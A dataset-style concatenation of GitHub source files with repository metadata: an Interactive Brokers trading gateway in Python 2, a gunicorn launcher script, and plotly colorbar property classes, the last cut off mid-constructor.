self.template_engine(("%|if False:\n%+%|yield None%-",), node)
scanner_code._tokens = None # save memory
scanner_code._customize = None # save memory
| [
"[email protected]"
]
| |
c90f2f2b47255a6b5eea2c2bb753ceb5989e6fe0 | 51fd69cc133a4f5eba61c90dbc87ff6531445840 | /ib/ib_gateway.py | d826f27ac7409133e3d98ecf5fef22fce4fd8ed7 | []
| no_license | risecloud/pyktrader2 | 36c7a8b3730fb6e900df488e67d78b453b14baf0 | 0d012bae464969dd893b7bf87ae689efa2d0bccc | refs/heads/master | 2021-04-28T14:19:54.616928 | 2018-02-13T17:56:26 | 2018-02-13T17:56:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 27,983 | py | # encoding: UTF-8
'''
Interactive Brokers的gateway接入,已经替换为vn.ib封装。
注意事项:
1. ib api只能获取和操作当前连接后下的单,并且每次重启程序后,之前下的单子收不到
2. ib api的成交也只会推送当前连接后的成交
3. ib api的持仓和账户更新可以订阅成主推模式,因此qryAccount和qryPosition就用不到了
4. 目前只支持股票和期货交易,ib api里期权合约的确定是基于Contract对象的多个字段,比较复杂暂时没做
5. 海外市场的交易规则和国内有很多细节上的不同,所以一些字段类型的映射可能不合理,如果发现问题欢迎指出
'''
import os
import json
import calendar
from datetime import datetime, timedelta
from copy import copy
from vnib import IbApi, Contract, Order, TagValueList
from gateway import *
# 以下为一些VT类型和CTP类型的映射字典
# 价格类型映射
priceTypeMap = {}
priceTypeMap[PRICETYPE_LIMITPRICE] = 'LMT'
priceTypeMap[PRICETYPE_MARKETPRICE] = 'MKT'
priceTypeMapReverse = {v: k for k, v in priceTypeMap.items()}
# 方向类型映射
directionMap = {}
directionMap[DIRECTION_LONG] = 'BUY'
#directionMap[DIRECTION_SHORT] = 'SSHORT' # SSHORT在IB系统中代表对股票的融券做空(而不是国内常见的卖出)
directionMap[DIRECTION_SHORT] = 'SELL' # 出于和国内的统一性考虑,这里选择把IB里的SELL印射为vt的SHORT
directionMapReverse = {v: k for k, v in directionMap.items()}
directionMapReverse['BOT'] = DIRECTION_LONG
directionMapReverse['SLD'] = DIRECTION_SHORT
# 交易所类型映射
exchangeMap = {}
exchangeMap[EXCHANGE_SMART] = 'SMART'
exchangeMap[EXCHANGE_NYMEX] = 'NYMEX'
exchangeMap[EXCHANGE_GLOBEX] = 'GLOBEX'
exchangeMap[EXCHANGE_IDEALPRO] = 'IDEALPRO'
exchangeMap[EXCHANGE_HKEX] = 'HKEX'
exchangeMap[EXCHANGE_HKFE] = 'HKFE'
exchangeMapReverse = {v:k for k,v in exchangeMap.items()}
# 报单状态映射
orderStatusMap = {}
orderStatusMap[STATUS_NOTTRADED] = 'Submitted'
orderStatusMap[STATUS_ALLTRADED] = 'Filled'
orderStatusMap[STATUS_CANCELLED] = 'Cancelled'
orderStatusMapReverse = {v:k for k,v in orderStatusMap.items()}
orderStatusMapReverse['PendingSubmit'] = STATUS_UNKNOWN # 这里未来视乎需求可以拓展vt订单的状态类型
orderStatusMapReverse['PendingCancel'] = STATUS_UNKNOWN
orderStatusMapReverse['PreSubmitted'] = STATUS_UNKNOWN
orderStatusMapReverse['Inactive'] = STATUS_UNKNOWN
# 合约类型映射
productClassMap = {}
productClassMap[PRODUCT_EQUITY] = 'STK'
productClassMap[PRODUCT_FUTURES] = 'FUT'
productClassMap[PRODUCT_OPTION] = 'OPT'
productClassMap[PRODUCT_FOREX] = 'CASH'
productClassMap[PRODUCT_INDEX] = 'IND'
productClassMapReverse = {v:k for k,v in productClassMap.items()}
# 期权类型映射
optionTypeMap = {}
optionTypeMap[OPTION_CALL] = 'CALL'
optionTypeMap[OPTION_PUT] = 'PUT'
optionTypeMap = {v:k for k,v in optionTypeMap.items()}
# 货币类型映射
currencyMap = {}
currencyMap[CURRENCY_USD] = 'USD'
currencyMap[CURRENCY_CNY] = 'CNY'
currencyMap[CURRENCY_HKD] = 'HKD'
currencyMap = {v:k for k,v in currencyMap.items()}
# Tick数据的Field和名称映射
tickFieldMap = {}
tickFieldMap[0] = 'bidVolume1'
tickFieldMap[1] = 'bidPrice1'
tickFieldMap[2] = 'askPrice1'
tickFieldMap[3] = 'askVolume1'
tickFieldMap[4] = 'lastPrice'
tickFieldMap[5] = 'lastVolume'
tickFieldMap[6] = 'highPrice'
tickFieldMap[7] = 'lowPrice'
tickFieldMap[8] = 'volume'
tickFieldMap[9] = 'preClosePrice'
tickFieldMap[14] = 'openPrice'
tickFieldMap[22] = 'openInterest'
# Account数据Key和名称的映射
accountKeyMap = {}
accountKeyMap['NetLiquidationByCurrency'] = 'balance'
accountKeyMap['NetLiquidation'] = 'balance'
accountKeyMap['UnrealizedPnL'] = 'positionProfit'
accountKeyMap['AvailableFunds'] = 'available'
accountKeyMap['MaintMarginReq'] = 'margin'
########################################################################
class IbGateway(Gateway):
"""IB接口"""
#----------------------------------------------------------------------
def __init__(self, eventEngine, gatewayName='IB'):
"""Constructor"""
super(IbGateway, self).__init__(eventEngine, gatewayName)
self.host = EMPTY_STRING # 连接地址
self.port = EMPTY_INT # 连接端口
self.clientId = EMPTY_INT # 用户编号
self.accountCode = EMPTY_STRING # 账户编号
self.tickerId = 0 # 订阅行情时的代码编号
self.tickDict = {} # tick快照字典,key为tickerId,value为VtTickData对象
self.tickProductDict = {} # tick对应的产品类型字典,key为tickerId,value为产品类型
self.orderId = 0 # 订单编号
self.orderDict = {} # 报单字典,key为orderId,value为VtOrderData对象
self.accountDict = {} # 账户字典
self.contractDict = {} # 合约字典
self.subscribeReqDict = {} # 用来保存订阅请求的字典
self.connected = False # 连接状态
self.api = IbWrapper(self) # API接口
#----------------------------------------------------------------------
def connect(self):
"""连接"""
# 载入json文件
fileName = self.file_prefix + 'connect.json'
try:
f = file(fileName)
except IOError:
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'读取连接配置出错,请检查'
self.onLog(log)
return
# 解析json文件
setting = json.load(f)
try:
self.host = str(setting['host'])
self.port = int(setting['port'])
self.clientId = int(setting['clientId'])
self.accountCode = str(setting['accountCode'])
except KeyError:
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'连接配置缺少字段,请检查'
self.onLog(log)
return
# 发起连接
self.api.eConnect(self.host, self.port, self.clientId, False)
# 查询服务器时间
self.api.reqCurrentTime()
#----------------------------------------------------------------------
def subscribe(self, subscribeReq):
"""订阅行情"""
# 如果尚未连接行情,则将订阅请求缓存下来后直接返回
if not self.connected:
self.subscribeReqDict[subscribeReq.symbol] = subscribeReq
return
contract = Contract()
contract.localSymbol = str(subscribeReq.symbol)
contract.exchange = exchangeMap.get(subscribeReq.exchange, '')
contract.secType = productClassMap.get(subscribeReq.productClass, '')
contract.currency = currencyMap.get(subscribeReq.currency, '')
contract.expiry = subscribeReq.expiry
contract.strike = subscribeReq.strikePrice
contract.right = optionTypeMap.get(subscribeReq.optionType, '')
# 获取合约详细信息
self.tickerId += 1
self.api.reqContractDetails(self.tickerId, contract)
# 创建合约对象并保存到字典中
ct = VtContractData()
ct.gatewayName = self.gatewayName
ct.symbol = str(subscribeReq.symbol)
ct.exchange = subscribeReq.exchange
ct.vtSymbol = '.'.join([ct.symbol, ct.exchange])
ct.productClass = subscribeReq.productClass
self.contractDict[ct.vtSymbol] = ct
# 订阅行情
self.tickerId += 1
self.api.reqMktData(self.tickerId, contract, '', False, TagValueList())
# 创建Tick对象并保存到字典中
tick = VtTickData()
tick.symbol = subscribeReq.symbol
tick.exchange = subscribeReq.exchange
tick.vtSymbol = '.'.join([tick.symbol, tick.exchange])
tick.gatewayName = self.gatewayName
self.tickDict[self.tickerId] = tick
self.tickProductDict[self.tickerId] = subscribeReq.productClass
#----------------------------------------------------------------------
def sendOrder(self, orderReq):
"""发单"""
# 增加报单号1,最后再次进行查询
# 这里双重设计的目的是为了防止某些情况下,连续发单时,nextOrderId的回调推送速度慢导致没有更新
self.orderId += 1
# 创建合约对象
contract = Contract()
contract.localSymbol = str(orderReq.symbol)
contract.exchange = exchangeMap.get(orderReq.exchange, '')
contract.secType = productClassMap.get(orderReq.productClass, '')
contract.currency = currencyMap.get(orderReq.currency, '')
contract.expiry = orderReq.expiry
contract.strike = orderReq.strikePrice
contract.right = optionTypeMap.get(orderReq.optionType, '')
contract.lastTradeDateOrContractMonth = str(orderReq.lastTradeDateOrContractMonth)
contract.multiplier = str(orderReq.multiplier)
# 创建委托对象
order = Order()
order.orderId = self.orderId
order.clientId = self.clientId
order.action = directionMap.get(orderReq.direction, '')
order.lmtPrice = orderReq.price
order.totalQuantity = orderReq.volume
order.orderType = priceTypeMap.get(orderReq.priceType, '')
# 发送委托
self.api.placeOrder(self.orderId, contract, order)
# 查询下一个有效编号
self.api.reqIds(1)
# 返回委托编号
vtOrderID = '.'.join([self.gatewayName, str(self.orderId)])
return vtOrderID
#----------------------------------------------------------------------
def cancelOrder(self, cancelOrderReq):
"""撤单"""
self.api.cancelOrder(int(cancelOrderReq.orderID))
#----------------------------------------------------------------------
def qryAccount(self):
"""查询账户资金"""
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = 'No need to query Account info'
self.onLog(log)
#----------------------------------------------------------------------
def qryPosition(self):
"""查询持仓"""
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = 'No need to query Position info'
self.onLog(log)
#----------------------------------------------------------------------
def close(self):
"""关闭"""
self.api.eDisconnect()
########################################################################
class IbWrapper(IbApi):
"""IB回调接口的实现"""
#----------------------------------------------------------------------
def __init__(self, gateway):
"""Constructor"""
super(IbWrapper, self).__init__()
self.apiStatus = False # 连接状态
self.gateway = gateway # gateway对象
self.gatewayName = gateway.gatewayName # gateway对象名称
self.tickDict = gateway.tickDict # tick快照字典,key为tickerId,value为VtTickData对象
self.orderDict = gateway.orderDict # order字典
self.accountDict = gateway.accountDict # account字典
self.contractDict = gateway.contractDict # contract字典
self.tickProductDict = gateway.tickProductDict
self.subscribeReqDict = gateway.subscribeReqDict
#----------------------------------------------------------------------
def nextValidId(self, orderId):
""""""
self.gateway.orderId = orderId
#----------------------------------------------------------------------
def currentTime(self, time):
"""连接成功后推送当前时间"""
dt = datetime.fromtimestamp(time)
t = dt.strftime("%Y-%m-%d %H:%M:%S.%f")
self.apiStatus = True
self.gateway.connected = True
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'行情服务器连接成功 t = %s' % t
self.gateway.onLog(log)
for symbol, req in self.subscribeReqDict.items():
del self.subscribeReqDict[symbol]
self.gateway.subscribe(req)
#----------------------------------------------------------------------
def connectAck(self):
""""""
pass
#----------------------------------------------------------------------
def error(self, id_, errorCode, errorString):
"""错误推送"""
err = VtErrorData()
err.gatewayName = self.gatewayName
err.errorID = errorCode
err.errorMsg = errorString.decode('GBK')
self.gateway.onError(err)
#----------------------------------------------------------------------
def accountSummary(self, reqId, account, tag, value, curency):
""""""
pass
#----------------------------------------------------------------------
def accountSummaryEnd(self, reqId):
""""""
pass
#----------------------------------------------------------------------
def tickPrice(self, tickerId, field, price, canAutoExecute):
"""行情价格相关推送"""
if field in tickFieldMap:
# 对于股票、期货等行情,有新价格推送时仅更新tick缓存
# 只有当发生成交后,tickString更新最新成交价时才推送新的tick
# 即bid/ask的价格变动并不会触发新的tick推送
tick = self.tickDict[tickerId]
key = tickFieldMap[field]
tick.__setattr__(key, price)
# IB的外汇行情没有成交价和时间,通过本地计算生成,同时立即推送
if self.tickProductDict[tickerId] == PRODUCT_FOREX:
tick.lastPrice = (tick.bidPrice1 + tick.askPrice1) / 2
dt = datetime.now()
tick.time = dt.strftime('%H:%M:%S.%f')
tick.date = dt.strftime('%Y%m%d')
# 行情数据更新
newtick = copy(tick)
self.gateway.onTick(newtick)
else:
print field
#----------------------------------------------------------------------
def tickSize(self, tickerId, field, size):
"""行情数量相关推送"""
if field in tickFieldMap:
tick = self.tickDict[tickerId]
key = tickFieldMap[field]
tick.__setattr__(key, size)
else:
print field
#----------------------------------------------------------------------
def tickOptionComputation(self, tickerId, tickType, impliedVol, delta, optPrice, pvDividend, gamma, vega, theta, undPrice):
""""""
pass
#----------------------------------------------------------------------
def tickGeneric(self, tickerId, tickType, value):
""""""
pass
#----------------------------------------------------------------------
def tickString(self, tickerId, tickType, value):
"""行情补充信息相关推送"""
# 如果是最新成交时间戳更新
if tickType == '45':
tick = self.tickDict[tickerId]
dt = datetime.fromtimestamp(value)
tick.time = dt.strftime('%H:%M:%S.%f')
tick.date = dt.strftime('%Y%m%d')
newtick = copy(tick)
self.gateway.onTick(newtick)
#----------------------------------------------------------------------
def tickEFP(self, tickerId, tickType, basisPoints, formattedBasisPoints, totalDividends, holdDays, futureLastTradeDate, dividendImpact, dividendsToLastTradeDate):
""""""
pass
#----------------------------------------------------------------------
def orderStatus(self, orderId, status, filled, remaining, avgFillPrice, permId, parentId, lastFillPrice, clientId, whyHeld):
"""委托状态更新"""
orderId = str(orderId)
if orderId in self.orderDict:
od = self.orderDict[orderId]
else:
od = VtOrderData() # od代表orderData
od.orderID = orderId
od.vtOrderID = '.'.join([self.gatewayName, orderId])
od.gatewayName = self.gatewayName
self.orderDict[orderId] = od
od.status = orderStatusMapReverse.get(status, STATUS_UNKNOWN)
od.tradedVolume = filled
newod = copy(od)
self.gateway.onOrder(newod)
#----------------------------------------------------------------------
def openOrder(self, orderId, contract, order, orderState):
"""下达委托推送"""
orderId = str(orderId) # orderId是整数
if orderId in self.orderDict:
od = self.orderDict[orderId]
else:
od = VtOrderData() # od代表orderData
od.orderID = orderId
od.vtOrderID = '.'.join([self.gatewayName, orderId])
od.symbol = contract.localSymbol
od.exchange = exchangeMapReverse.get(contract.exchange, '')
od.vtSymbol = '.'.join([od.symbol, od.exchange])
od.gatewayName = self.gatewayName
self.orderDict[orderId] = od
od.direction = directionMapReverse.get(order.action, '')
od.price = order.lmtPrice
od.totalVolume = order.totalQuantity
newod = copy(od)
self.gateway.onOrder(newod)
#----------------------------------------------------------------------
def openOrderEnd(self):
""""""
pass
#----------------------------------------------------------------------
def winError(self, str_, lastError):
""""""
pass
#----------------------------------------------------------------------
def connectionClosed(self):
"""断线"""
self.apiStatus = False
self.gateway.connected = False
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'服务器连接断开'
self.gateway.onLog(log)
#----------------------------------------------------------------------
def updateAccountValue(self, key, val, currency, accountName):
"""更新账户数据"""
# 仅逐个字段更新数据,这里对于没有currency的推送忽略
if currency:
name = '.'.join([accountName, currency])
if name in self.accountDict:
account = self.accountDict[name]
else:
account = VtAccountData()
account.accountID = name
account.vtAccountID = name
account.gatewayName = self.gatewayName
self.accountDict[name] = account
if key in accountKeyMap:
k = accountKeyMap[key]
account.__setattr__(k, float(val))
#----------------------------------------------------------------------
def updatePortfolio(self, contract, position, marketPrice, marketValue, averageCost, unrealizedPNL, realizedPNL, accountName):
"""持仓更新"""
pos = VtPositionData()
pos.symbol = contract.localSymbol
pos.exchange = exchangeMapReverse.get(contract.exchange, contract.exchange)
pos.vtSymbol = '.'.join([pos.symbol, pos.exchange])
pos.direction = DIRECTION_NET
pos.position = position
pos.price = averageCost
pos.vtPositionName = pos.vtSymbol
pos.gatewayName = self.gatewayName
self.gateway.onPosition(pos)
#----------------------------------------------------------------------
def updateAccountTime(self, timeStamp):
"""更新账户时间"""
# 推送数据
for account in self.accountDict.values():
newaccount = copy(account)
self.gateway.onAccount(newaccount)
#----------------------------------------------------------------------
def accountDownloadEnd(self, accountName):
""""""
pass
#----------------------------------------------------------------------
def contractDetails(self, reqId, contractDetails):
"""合约查询回报"""
symbol = contractDetails.summary.localSymbol
exchange = exchangeMapReverse.get(contractDetails.summary.exchange, EXCHANGE_UNKNOWN)
vtSymbol = '.'.join([symbol, exchange])
ct = self.contractDict.get(vtSymbol, None)
if not ct:
return
ct.name = contractDetails.longName.decode('UTF-8')
ct.priceTick = contractDetails.minTick
# 推送
self.gateway.onContract(ct)
#----------------------------------------------------------------------
def bondContractDetails(self, reqId, contractDetails):
""""""
pass
#----------------------------------------------------------------------
def contractDetailsEnd(self, reqId):
""""""
pass
#----------------------------------------------------------------------
def execDetails(self, reqId, contract, execution):
"""成交推送"""
trade = VtTradeData()
trade.gatewayName = self.gatewayName
trade.tradeID = execution.execId
trade.vtTradeID = '.'.join([self.gatewayName, trade.tradeID])
trade.symbol = contract.localSymbol
trade.exchange = exchangeMapReverse.get(contract.exchange, '')
trade.vtSymbol = '.'.join([trade.symbol, trade.exchange])
trade.orderID = str(execution.orderId)
trade.vtOrderID = '.'.join([self.gatewayName, trade.orderID])
trade.direction = directionMapReverse.get(execution.side, '')
trade.price = execution.price
trade.volume = execution.shares
trade.tradeTime = execution.time
self.gateway.onTrade(trade)
#----------------------------------------------------------------------
def execDetailsEnd(self, reqId):
""""""
pass
#----------------------------------------------------------------------
def updateMktDepth(self, id_, position, operation, side, price, size):
""""""
pass
#----------------------------------------------------------------------
def updateMktDepthL2(self, id_, position, marketMaker, operation, side, price, size):
""""""
pass
#----------------------------------------------------------------------
def updateNewsBulletin(self, msgId, msgType, newsMessage, originExch):
""""""
pass
#----------------------------------------------------------------------
def managedAccounts(self, accountsList):
"""推送管理账户的信息"""
l = accountsList.split(',')
# 请求账户数据主推更新
for account in l:
self.reqAccountUpdates(True, account)
#----------------------------------------------------------------------
def receiveFA(self, pFaDataType, cxml):
""""""
pass
#----------------------------------------------------------------------
def historicalData(self, reqId, date, open_, high, low, close, volume, barCount, WAP, hasGaps):
""""""
pass
#----------------------------------------------------------------------
def scannerParameters(self, xml):
""""""
pass
#----------------------------------------------------------------------
def scannerData(self, reqId, rank, contractDetails, distance, benchmark, projection, legsStr):
""""""
pass
#----------------------------------------------------------------------
def scannerDataEnd(self, reqId):
""""""
pass
#----------------------------------------------------------------------
def realtimeBar(self, reqId, time, open_, high, low, close, volume, wap, count):
""""""
pass
#----------------------------------------------------------------------
def fundamentalData(self, reqId, data):
""""""
pass
#----------------------------------------------------------------------
def deltaNeutralValidation(self, reqId, underComp):
""""""
pass
#----------------------------------------------------------------------
def tickSnapshotEnd(self, reqId):
""""""
pass
#----------------------------------------------------------------------
def marketDataType(self, reqId, marketDataType):
""""""
pass
#----------------------------------------------------------------------
def commissionReport(self, commissionReport):
""""""
pass
#----------------------------------------------------------------------
def position(self, account, contract, position, avgCost):
""""""
pass
#----------------------------------------------------------------------
def positionEnd(self):
""""""
pass
#----------------------------------------------------------------------
def verifyMessageAPI(self, apiData):
""""""
pass
#----------------------------------------------------------------------
def verifyCompleted(self, isSuccessful, errorText):
""""""
pass
#----------------------------------------------------------------------
def displayGroupList(self, reqId, groups):
""""""
pass
#----------------------------------------------------------------------
def displayGroupUpdated(self, reqId, contractInfo):
""""""
pass
#----------------------------------------------------------------------
def verifyAndAuthMessageAPI(self, apiData, xyzChallange):
""""""
pass
#----------------------------------------------------------------------
def verifyAndAuthCompleted(self, isSuccessful, errorText):
""""""
pass
#----------------------------------------------------------------------
def positionMulti(self, reqId, account, modelCode, contract, pos, avgCost):
""""""
pass
#----------------------------------------------------------------------
def positionMultiEnd(self, reqId):
""""""
pass
#----------------------------------------------------------------------
def accountUpdateMulti(self, reqId, account, modelCode, key, value, currency):
""""""
pass
#----------------------------------------------------------------------
def accountUpdateMultiEnd(self, reqId):
""""""
pass
#----------------------------------------------------------------------
def securityDefinitionOptionalParameter(self, reqId, exchange, underlyingConId, tradingClass, multiplier, expirations, strikes):
""""""
pass
#----------------------------------------------------------------------
def securityDefinitionOptionalParameterEnd(self, reqId):
""""""
pass
#----------------------------------------------------------------------
def softDollarTiers(self, reqId, tiers):
""""""
pass
| [
"[email protected]"
]
| |
3c75260b5e4ea95e62b5308d82fca71483ebc612 | 443d8ce2b7b706236eda935e0cd809c3ed9ddae3 | /virtual/bin/gunicorn | ca6b74ade67c3e02d6ea287a95095fbacd1cee42 | [
"MIT"
]
| permissive | billowbashir/MaNeighba | 269db52b506d4954e2907369340c97ce2c3a7a2f | 84ee7f86ac471c5449d94bd592adf004b3288823 | refs/heads/master | 2021-11-21T14:22:14.891877 | 2020-02-13T09:41:21 | 2020-02-13T09:41:21 | 153,802,533 | 0 | 0 | null | 2021-09-08T00:33:53 | 2018-10-19T15:15:16 | Python | UTF-8 | Python | false | false | 246 | #!/home/bashir/MaNeighba/virtual/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from gunicorn.app.wsgiapp import run
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(run())
| [
"[email protected]"
]
| ||
f8332b51ff86f76385fbe4be9e2a971f78b0b4df | bb1e0e89fcf1f1ffb61214ddf262ba327dd10757 | /plotly_study/graph_objs/choropleth/colorbar/__init__.py | 260c248d1ed0c88a620f4f61647a5a35e410ceb2 | [
"MIT"
]
| permissive | lucasiscovici/plotly_py | ccb8c3ced89a0f7eccf1ae98551fa712460033fe | 42ab769febb45fbbe0a3c677dc4306a4f59cea36 | refs/heads/master | 2020-09-12T05:43:12.363609 | 2019-12-02T15:13:13 | 2019-12-02T15:13:13 | 222,328,180 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 25,104 | py | from plotly_study.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Title(_BaseTraceHierarchyType):
# font
# ----
@property
def font(self):
"""
Sets this color bar's title font. Note that the title's font
used to be set by the now deprecated `titlefont` attribute.
The 'font' property is an instance of Font
that may be specified as:
- An instance of plotly_study.graph_objs.choropleth.colorbar.title.Font
- A dict of string/value properties that will be passed
to the Font constructor
Supported dict properties:
color
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The plotly service (at https://plot.ly
or on-premise) generates images on a server,
where only a select number of fonts are
installed and supported. These include "Arial",
"Balto", "Courier New", "Droid Sans",, "Droid
Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
size
Returns
-------
plotly_study.graph_objs.choropleth.colorbar.title.Font
"""
return self["font"]
@font.setter
def font(self, val):
self["font"] = val
# side
# ----
@property
def side(self):
"""
Determines the location of color bar's title with respect to
the color bar. Note that the title's location used to be set by
the now deprecated `titleside` attribute.
The 'side' property is an enumeration that may be specified as:
- One of the following enumeration values:
['right', 'top', 'bottom']
Returns
-------
Any
"""
return self["side"]
@side.setter
def side(self, val):
self["side"] = val
# text
# ----
@property
def text(self):
"""
Sets the title of the color bar. Note that before the existence
of `title.text`, the title's contents used to be defined as the
`title` attribute itself. This behavior has been deprecated.
The 'text' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["text"]
@text.setter
def text(self, val):
self["text"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "choropleth.colorbar"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
font
Sets this color bar's title font. Note that the title's
font used to be set by the now deprecated `titlefont`
attribute.
side
Determines the location of color bar's title with
respect to the color bar. Note that the title's
location used to be set by the now deprecated
`titleside` attribute.
text
Sets the title of the color bar. Note that before the
existence of `title.text`, the title's contents used to
be defined as the `title` attribute itself. This
behavior has been deprecated.
"""
def __init__(self, arg=None, font=None, side=None, text=None, **kwargs):
"""
Construct a new Title object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
plotly_study.graph_objs.choropleth.colorbar.Title
font
Sets this color bar's title font. Note that the title's
font used to be set by the now deprecated `titlefont`
attribute.
side
Determines the location of color bar's title with
respect to the color bar. Note that the title's
location used to be set by the now deprecated
`titleside` attribute.
text
Sets the title of the color bar. Note that before the
existence of `title.text`, the title's contents used to
be defined as the `title` attribute itself. This
behavior has been deprecated.
Returns
-------
Title
"""
super(Title, self).__init__("title")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly_study.graph_objs.choropleth.colorbar.Title
constructor must be a dict or
an instance of plotly_study.graph_objs.choropleth.colorbar.Title"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly_study.validators.choropleth.colorbar import title as v_title
# Initialize validators
# ---------------------
self._validators["font"] = v_title.FontValidator()
self._validators["side"] = v_title.SideValidator()
self._validators["text"] = v_title.TextValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("font", None)
self["font"] = font if font is not None else _v
_v = arg.pop("side", None)
self["side"] = side if side is not None else _v
_v = arg.pop("text", None)
self["text"] = text if text is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly_study.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Tickformatstop(_BaseTraceHierarchyType):
# dtickrange
# ----------
@property
def dtickrange(self):
"""
range [*min*, *max*], where "min", "max" - dtick values which
describe some zoom level, it is possible to omit "min" or "max"
value by passing "null"
The 'dtickrange' property is an info array that may be specified as:
* a list or tuple of 2 elements where:
(0) The 'dtickrange[0]' property accepts values of any type
(1) The 'dtickrange[1]' property accepts values of any type
Returns
-------
list
"""
return self["dtickrange"]
@dtickrange.setter
def dtickrange(self, val):
self["dtickrange"] = val
# enabled
# -------
@property
def enabled(self):
"""
Determines whether or not this stop is used. If `false`, this
stop is ignored even within its `dtickrange`.
The 'enabled' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["enabled"]
@enabled.setter
def enabled(self, val):
self["enabled"] = val
# name
# ----
@property
def name(self):
"""
When used in a template, named items are created in the output
figure in addition to any items the figure already has in this
array. You can modify these items in the output figure by
making your own item with `templateitemname` matching this
`name` alongside your modifications (including `visible: false`
or `enabled: false` to hide it). Has no effect outside of a
template.
The 'name' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["name"]
@name.setter
def name(self, val):
self["name"] = val
# templateitemname
# ----------------
@property
def templateitemname(self):
"""
Used to refer to a named item in this array in the template.
Named items from the template will be created even without a
matching item in the input figure, but you can modify one by
making an item with `templateitemname` matching its `name`,
alongside your modifications (including `visible: false` or
`enabled: false` to hide it). If there is no template or no
matching item, this item will be hidden unless you explicitly
show it with `visible: true`.
The 'templateitemname' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["templateitemname"]
@templateitemname.setter
def templateitemname(self, val):
self["templateitemname"] = val
# value
# -----
@property
def value(self):
"""
string - dtickformat for described zoom level, the same as
"tickformat"
The 'value' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["value"]
@value.setter
def value(self, val):
self["value"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "choropleth.colorbar"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
dtickrange
range [*min*, *max*], where "min", "max" - dtick values
which describe some zoom level, it is possible to omit
"min" or "max" value by passing "null"
enabled
Determines whether or not this stop is used. If
`false`, this stop is ignored even within its
`dtickrange`.
name
When used in a template, named items are created in the
output figure in addition to any items the figure
already has in this array. You can modify these items
in the output figure by making your own item with
`templateitemname` matching this `name` alongside your
modifications (including `visible: false` or `enabled:
false` to hide it). Has no effect outside of a
template.
templateitemname
Used to refer to a named item in this array in the
template. Named items from the template will be created
even without a matching item in the input figure, but
you can modify one by making an item with
`templateitemname` matching its `name`, alongside your
modifications (including `visible: false` or `enabled:
false` to hide it). If there is no template or no
matching item, this item will be hidden unless you
explicitly show it with `visible: true`.
value
string - dtickformat for described zoom level, the same
as "tickformat"
"""
def __init__(
self,
arg=None,
dtickrange=None,
enabled=None,
name=None,
templateitemname=None,
value=None,
**kwargs
):
"""
Construct a new Tickformatstop object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
plotly_study.graph_objs.choropleth.colorbar.Tickformatstop
dtickrange
range [*min*, *max*], where "min", "max" - dtick values
which describe some zoom level, it is possible to omit
"min" or "max" value by passing "null"
enabled
Determines whether or not this stop is used. If
`false`, this stop is ignored even within its
`dtickrange`.
name
When used in a template, named items are created in the
output figure in addition to any items the figure
already has in this array. You can modify these items
in the output figure by making your own item with
`templateitemname` matching this `name` alongside your
modifications (including `visible: false` or `enabled:
false` to hide it). Has no effect outside of a
template.
templateitemname
Used to refer to a named item in this array in the
template. Named items from the template will be created
even without a matching item in the input figure, but
you can modify one by making an item with
`templateitemname` matching its `name`, alongside your
modifications (including `visible: false` or `enabled:
false` to hide it). If there is no template or no
matching item, this item will be hidden unless you
explicitly show it with `visible: true`.
value
string - dtickformat for described zoom level, the same
as "tickformat"
Returns
-------
Tickformatstop
"""
super(Tickformatstop, self).__init__("tickformatstops")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly_study.graph_objs.choropleth.colorbar.Tickformatstop
constructor must be a dict or
an instance of plotly_study.graph_objs.choropleth.colorbar.Tickformatstop"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly_study.validators.choropleth.colorbar import (
tickformatstop as v_tickformatstop,
)
# Initialize validators
# ---------------------
self._validators["dtickrange"] = v_tickformatstop.DtickrangeValidator()
self._validators["enabled"] = v_tickformatstop.EnabledValidator()
self._validators["name"] = v_tickformatstop.NameValidator()
self._validators[
"templateitemname"
] = v_tickformatstop.TemplateitemnameValidator()
self._validators["value"] = v_tickformatstop.ValueValidator()
